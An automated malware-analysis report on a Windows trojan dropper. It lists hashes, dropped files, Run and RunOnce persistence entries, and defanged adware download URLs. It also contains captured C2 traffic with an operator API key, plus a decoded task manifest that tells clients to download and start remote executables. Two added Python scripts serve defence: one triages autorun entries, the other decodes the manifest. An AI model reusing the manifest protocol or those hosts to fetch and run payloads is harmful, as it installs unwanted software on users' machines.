Sample_315a1eb4a6
HEUR:Trojan.Win32.Generic (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 315a1eb4a63efcba76c09cc7ef725666
SHA1: bac5fca266f7ea4647c40d73525298909a941ccb
SHA256: 95cea4afe105f1ccc617f75eed8586727c48aba41fb4b8467f9140738f538967
SSDeep: 6144:8c03xO8yek6ujmsZJqsqfm9WmGVJ7bIBNLbZGrAJj2aCctfaH84:zeMF6r38T/iAJjNaHt
Size: 340480 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-06-28 05:18:16
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
AfficheOne.exe:1472
Era5Le.exe:720
Like.exe:2336
%original file name%.exe:3380
The Trojan injects its code into the following process(es):
b5c1hnwf0gs.exe:3696
L37EQRQBZ.exe:3840
%original file name%.exe:3424
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process AfficheOne.exe:1472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe (208 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (868 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe.config (1 bytes)
(The security.config.cch.new and enterprisesec.config.cch.new writes here and in the blocks below, together with the matching *.config.cch.<pid>.<n> deletions, are the .NET 2.0 runtime refreshing its security-policy cache. They identify the processes as .NET 2.0 executables; they are not policy tampering.)
The process L37EQRQBZ.exe:3840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\8E1ZIRJA0X\cast.config (36 bytes)
The process Era5Le.exe:720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\8E1ZIRJA0X\uninstaller.exe (25488 bytes)
%Program Files%\8E1ZIRJA0X\L37EQRQBZ.exe.config (1 bytes)
%Program Files%\8E1ZIRJA0X\L37EQRQBZ.exe (125291 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
%Program Files%\8E1ZIRJA0X\uninstaller.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.720.340440 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.720.340440 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.720.340440 (0 bytes)
The process Like.exe:2336 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (844 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (844 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (844 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2336.342827 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2336.342827 (0 bytes)
The process %original file name%.exe:3424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\AfficheOne.exe (400 bytes)
C:\config.conf (62 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Like.exe (232527 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Era5Le.exe (17276 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\AfficheOne.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Like.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Era5Le.exe.config (1 bytes)
Registry activity
The process b5c1hnwf0gs.exe:3696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"
To run itself automatically each time the user logs on, the Trojan adds the following value to the autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"2niiqjaqkuj" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe"
The process AfficheOne.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
"AutoDetect" = "1"
(The Tracing\<image>_RASAPI32 and _RASMANCS values, here and for every process below, are written by Windows itself when a process loads the RAS API, which WinINet does on first use; the ZoneMap values and deletions are Internet Explorer's zone-mapping defaults being initialised. They show that the process performed Internet I/O, not that it configured tracing or proxy settings.)
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
The process L37EQRQBZ.exe:3840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\L37EQRQBZ_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\L37EQRQBZ_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
To run itself automatically each time the user logs on, the Trojan adds the following value to the autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"5K2HTR1KQOQBJKK" = "%Program Files%\8E1ZIRJA0X\L37EQRQBZ.exe"
The process Era5Le.exe:720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
The process Like.exe:2336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
The process %original file name%.exe:3424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry (the sandbox ran the sample under its MD5 as the image name, hence the key names below):
[HKLM\SOFTWARE\Microsoft\Tracing\315a1eb4a63efcba76c09cc7ef725666_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\315a1eb4a63efcba76c09cc7ef725666_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
To run itself again at the next logon, the Trojan adds the following value to the RunOnce autorun key (Windows deletes a RunOnce value once it has executed, so this buys one more start rather than persistence across every boot):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_8TSGI" = "C:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
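The three autorun entries in this section (two HKCU\...\Run values pointing into randomly named directories under %AppData% and %Program Files%, and an HKLM\...\RunOnce value pointing at the dropper at the drive root) are the persistence a responder would sweep for. The script below is an added example, not part of the Lavasoft report: it parses autorun entries written in the report's own [key] / "name" = "data" notation and scores each with a small name-randomness heuristic. The three malicious entries are copied from above; the OneDrive and SecurityHealth entries are constructed benign examples for contrast, and the heuristic's rules and thresholds are assumptions for illustration, not a published detection.

```python
import itertools
import re
from typing import Dict, List

# Autorun entries in the report's "[key]" / "name" = "data" notation. The
# first three are copied from the registry section of this report; the
# OneDrive and SecurityHealth entries are constructed benign examples.
AUTORUN_ENTRIES = r'''
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"2niiqjaqkuj" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"5K2HTR1KQOQBJKK" = "%Program Files%\8E1ZIRJA0X\L37EQRQBZ.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_8TSGI" = "C:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive" = "C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth" = "%windir%\system32\SecurityHealthSystray.exe"
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"\s*=\s*"(.*)"$')
EXE_RE = re.compile(r'^"?(.*?\.exe)', re.I)      # executable path, before any arguments
VOWELS = set("aeiouy")


def looks_random(token: str) -> bool:
    """Heuristic for machine-generated names such as 0mpz3dha0z2 or L37EQRQBZ.

    Fires on any of three signals: letters and digits interleaved in three or
    more runs, a 'q' not followed by 'u', or under 20% vowels among the letters.
    Thresholds are an assumption tuned on this sample; treat the result as a
    triage score, not a verdict (a name like ctfmon trips the vowel rule).
    """
    core = token.rsplit(".", 1)[0].lower()        # drop a file extension
    if len(core) < 6:
        return False
    classes = ["d" if c.isdigit() else "a" if c.isalpha() else "_" for c in core]
    runs = [k for k, _ in itertools.groupby(c for c in classes if c != "_")]
    if len(runs) >= 3:
        return True
    if re.search(r"q(?!u)", core):
        return True
    letters = [c for c in core if c.isalpha()]
    return bool(letters) and sum(c in VOWELS for c in letters) / len(letters) < 0.2


def location_score(exe_path: str) -> int:
    """1 for user-writable staging areas or an executable sitting at a drive root."""
    p = exe_path.lower()
    if "\\appdata\\roaming\\" in p or "\\appdata\\local\\temp\\" in p:
        return 1
    return 1 if re.match(r"^[a-z]:\\[^\\]+$", p) else 0


def triage(report_text: str) -> List[Dict[str, object]]:
    """Parse autorun entries and score each one; a score of 2 or more is worth a look."""
    results: List[Dict[str, object]] = []
    key = ""
    for line in report_text.splitlines():
        km = KEY_RE.match(line)
        if km:
            key = km.group(1)
            continue
        vm = VALUE_RE.match(line)
        if not vm:
            continue
        name, data = vm.groups()
        em = EXE_RE.match(data)
        exe_path = em.group(1) if em else data
        *dirs, stem = exe_path.split("\\")
        reasons = []
        if looks_random(name):
            reasons.append("random value name")
        if looks_random(stem):
            reasons.append("random executable name")
        if any(looks_random(d) for d in dirs):
            reasons.append("random directory name")
        if location_score(exe_path):
            reasons.append("user-writable or drive-root location")
        results.append({"key": key, "name": name, "path": exe_path,
                        "score": len(reasons), "reasons": reasons})
    return results


if __name__ == "__main__":
    for r in triage(AUTORUN_ENTRIES):
        flag = "SUSPECT" if r["score"] >= 2 else "ok     "
        print(f"{flag} {r['score']} {r['name']!r:20} {r['path']}  {', '.join(r['reasons'])}")
```

On a live host the same scoring would be fed from reg query or Get-ItemProperty output rather than report text; the point is that the sample's three entries each trip at least two independent signals while the benign entries trip none.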
Dropped PE files
| MD5 | File path |
|---|---|
| 2d30dca9e3464b8b7fc3de9b3d29b22e | c:\Program Files\8E1ZIRJA0X\L37EQRQBZ.exe |
| 0e6a9832d083b9764e0346d755c1d746 | c:\Program Files\8E1ZIRJA0X\uninstaller.exe |
| 0e94d32f9913e36c636107c915e2d256 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\AfficheOne.exe |
| 6c0892a6555528ca1eb71ffd5f3c51c5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Era5Le.exe |
| 13348096fb9ebb9ea7e9a2af356061c3 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Like.exe |
| e31b5dc7c12fbb344fdf9e4db1946c45 | c:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: H8B74HD%B
Product Name: H8B74HD%
Product Version: 4.8.4.2
Legal Copyright: Copyright (c) 3309
Legal Trademarks:
Original Filename: SanJer66.exe
Internal Name: SanJer66.exe
File Version: 4.8.4.2
File Description: H8
Comments: H8B74HD%B
Language: Russian (Russia)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 334668 | 334848 | 4.20161 | 41d7ea96c8c17445d0138476bd648a2d |
| .rsrc | 344064 | 4472 | 4608 | 3.51241 | 1308b0ab6ae524d548c4ce2890894c47 |
| .reloc | 352256 | 12 | 512 | 0.070639 | 07d8019462c144b997aeaa315b24db18 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://www.wizzmonetize.com/remotes_xml_sections.php | |
| hxxp://lapapahoster.com/from_backup/AdsShow_installer.exe | |
| hxxp://lapapahoster.com/download/3/wizzcaster_installer_v2.exe | |
| hxxp://lapapahoster.com/get/4/updater.exe | |
| hxxp://lapapahoster.com/safe_download/582369/AdsShow.exe | |
| hxxp://lapapahoster.com/download/3/wizzcaster_v2.exe | |
| hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://lapapahoster.com/download/3/wizzcaster_uninstaller_v2.exe | |
| hxxp://www.wizzmonetize.com/api/v5/config | |
| hxxp://www.wizzmonetize.com/api/v5/link | |
| hxxp://wizzcaster.com/api/v5/config | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| hxxp://wizzcaster.com/api/v5/link | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=c65ff0effae7e78d46a71dad930654be8e478ee2; expires=Sat, 01-Jul-2017 12:27:40 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

{"time_between_prints":"15"}
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
....
uid=57a764d042bf8
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=1d223159165453ae5edea2aca148af763b4fda5a; expires=Sat, 01-Jul-2017 12:27:40 GMT; Max-Age=7200; path=/; httponly
Content-Length: 62
Content-Type: text/html; charset=UTF-8

{"link":"http:\/\/bigpicturepop.com\/redirect\/57a764d042bf8"}
GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:39 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

fe000
MZ... [binary body: PE image, .NET assembly (BSJB metadata header, CLR v2.0.50727), sections .text, .rsrc, .reloc; dump truncated by the analysis system]
GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1
Host: lapapahoster.com
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

4dc00
MZ... [binary body: PE image, .NET assembly (BSJB metadata header, CLR v2.0.50727), sections .text, .rsrc, .reloc; dump truncated by the analysis system]
GET /from_backup/AdsShow_installer.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:35 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

2800
MZ... [binary body: PE image, .NET assembly (BSJB metadata header, CLR v2.0.50727, #~ / #Strings / #US / #GUID / #Blob streams), sections .text, .rsrc, .reloc; dump truncated by the analysis system]
GET /download/3/wizzcaster_installer_v2.exe HTTP/1.1
Host: lapapahoster.com
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:35 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

54e00
MZ... [binary body: PE image, .NET assembly (BSJB metadata header, CLR v2.0.50727), sections .text, .rsrc, .reloc; dump truncated by the analysis system]
GET /get/4/updater.exe HTTP/1.1
Host: lapapahoster.com
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:35 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

211a00
MZ... [binary body: PE image, .NET assembly (BSJB metadata header, CLR v2.0.50727), sections .text, .rsrc, .reloc; dump truncated by the analysis system]
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47a47968c&buying_product_name=DefaultProduct&buying_partner_name=DefaultPartner&buying_channel_name=1
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:32 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=hrlss9h6bbv8oma9v0bdakv8d0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1644
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

PHVwZGF0ZXMgcmVmcmVzaD0iMTgwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IkFmZmljaGVPbmUiIHZhbHVlPSJodHRwOi8vbGFwYXBhaG9zdGVyLmNv
bS9mcm9tX2JhY2t1cC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIHNvZn
R3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IkFm
ZmljaGVPbmUiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8+DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iQWZmaWNoZU9uZSIgdmFsdWU9IjVlZTE3MDcwMSIvPg0KDQo8
L3BlcmZvcm0+DQoNCjxjb25kaXRpb25zPg0KDQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPS
JBZmZpY2hlT25lIiB2YWx1ZT0iOTUxNzA3MDEiIG1hdGNoPSJmYWxzZSIvPg0KDQo8L2Nv
bmRpdGlvbnM+DQo8L3Rhc2s+PHRhc2s+DQoNCjxwZXJmb3JtPg0KDQo8ZG93bmxvYWQgbm[...]+DQo8cHJvY2VzcyB0eXBlPSJzdGFydC
IgbmFtZT0iTGlrZSIgdmFsdWU9IndhaXQiIHBhcmFtcz0id2UiLz4NCjxtb2QgdHlwZT0i
YWRkIiBuYW1lPSJ1cFRvRGF0ZSIgdmFsdWU9IlNTYWFhMTcwNzAxIi8+DQoNCjwvcGVyZm
9ybT4NCg0KPGNvbmRpdGlvbnM+DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9InVw<<< skipped >>>
The body is base64-encoded XML. Decoded, with the capture's gaps kept:
<updates refresh="180">
<task>
<perform>
<download name="AfficheOne" value="http://lapapahoster.com/from_backup/AdsShow_installer.exe" version=""  software="" net="yes" />
<process type="start" name="AfficheOne" value="notwait" params="nimporte"/>
<mod type="add" name="AfficheOne" value="5ee170701"/>
</perform>
<conditions>
<mod type="check" name="AfficheOne" value="95170701" match="false"/>
</conditions>
</task><task>
<perform>
<download n[...]
<process type="start" name="Like" value="wait" params="we"/>
<mod type="add" name="upToDate" value="SSaaa170701"/>
</perform>
<conditions>
<mod type="check" name="up<<< skipped >>>
This is the task manifest that drives the dropper: each <task> downloads a component (here AdsShow_installer.exe, consistent with the AfficheOne.exe written under %Temp%\BFX6SAZTX6 in the file section), starts it, and records a version marker under a name such as AfficheOne; the <conditions> block gates the task on that marker not already matching, and the refresh="180" attribute is presumably the re-poll interval.
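The manifest format above is simple enough to parse mechanically, which is what an analyst would do to enumerate every download URL and version marker the C2 hands out. The script below is an added example, not code from the report or from the operators of this sample: it takes the response body as the report rendered it (base64 with every '+' mangled to a space, and a truncated tail), repairs and decodes it, and extracts each complete <task> into its <perform> actions and <conditions>. The input is the prefix of the captured blob up to its first elision; the element and attribute names are those seen in the decoded XML, and nothing beyond them is assumed.

```python
import base64
import re
from typing import Dict, List

# Prefix of the remotes_xml_sections.php response body as the report rendered
# it: the renderer turned every base64 '+' into a space, and the capture is
# cut off ("<<< skipped >>>"), so the last quantum is incomplete. Copied from
# the traffic dump above up to the first elision.
CAPTURED_B64 = """
PHVwZGF0ZXMgcmVmcmVzaD0iMTgwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IkFmZmljaGVPbmUiIHZhbHVlPSJodHRwOi8vbGFwYXBhaG9zdGVyLmNv
bS9mcm9tX2JhY2t1cC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIHNvZn
R3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IkFm
ZmljaGVPbmUiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iQWZmaWNoZU9uZSIgdmFsdWU9IjVlZTE3MDcwMSIvPg0KDQo8
L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0KDQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPS
JBZmZpY2hlT25lIiB2YWx1ZT0iOTUxNzA3MDEiIG1hdGNoPSJmYWxzZSIvPg0KDQo8L2Nv
bmRpdGlvbnM DQo8L3Rhc2s PHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bmxvYWQgbm
"""

TASK_RE = re.compile(r"<task>(.*?)</task>", re.S)
ELEMENT_RE = re.compile(r"<(download|process|mod)\b([^>]*?)/>", re.S)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"')
REFRESH_RE = re.compile(r'<updates\s+refresh="(\d+)"')


def decode_manifest(blob: str) -> str:
    """Undo the renderer damage and decode: spaces back to '+', line breaks
    dropped, a dangling single sextet discarded, padding restored."""
    compact = "".join("+" if ch == " " else ch for ch in blob if ch not in "\r\n\t")
    if len(compact) % 4 == 1:        # one leftover character cannot encode a byte
        compact = compact[:-1]
    compact += "=" * (-len(compact) % 4)
    return base64.b64decode(compact).decode("utf-8", errors="replace")


def _element(match) -> Dict[str, str]:
    """One self-closing element as {"tag": ..., attr: value, ...}."""
    attrs = dict(ATTR_RE.findall(match.group(2)))
    return {"tag": match.group(1), **attrs}


def parse_tasks(xml_text: str) -> List[Dict[str, List[Dict[str, str]]]]:
    """Return every complete <task>: the actions to <perform> and the
    <conditions> gating them. A task cut off by the truncation has no
    closing </task> and is skipped rather than half-parsed."""
    tasks = []
    for body in TASK_RE.findall(xml_text):
        perform, _, conditions = body.partition("<conditions>")
        tasks.append({
            "perform": [_element(m) for m in ELEMENT_RE.finditer(perform)],
            "conditions": [_element(m) for m in ELEMENT_RE.finditer(conditions)],
        })
    return tasks


def refresh_seconds(xml_text: str) -> int:
    """Value of the refresh attribute on <updates>, or -1 if absent."""
    m = REFRESH_RE.search(xml_text)
    return int(m.group(1)) if m else -1


def download_urls(tasks: List[Dict[str, List[Dict[str, str]]]]) -> List[str]:
    """Every URL the manifest instructs the client to fetch."""
    return [e["value"] for t in tasks for e in t["perform"] if e["tag"] == "download"]


if __name__ == "__main__":
    xml = decode_manifest(CAPTURED_B64)
    tasks = parse_tasks(xml)
    print("refresh:", refresh_seconds(xml))
    for i, t in enumerate(tasks):
        print(f"task {i}: perform={t['perform']}")
        print(f"task {i}: conditions={t['conditions']}")
    print("downloads:", download_urls(tasks))
```

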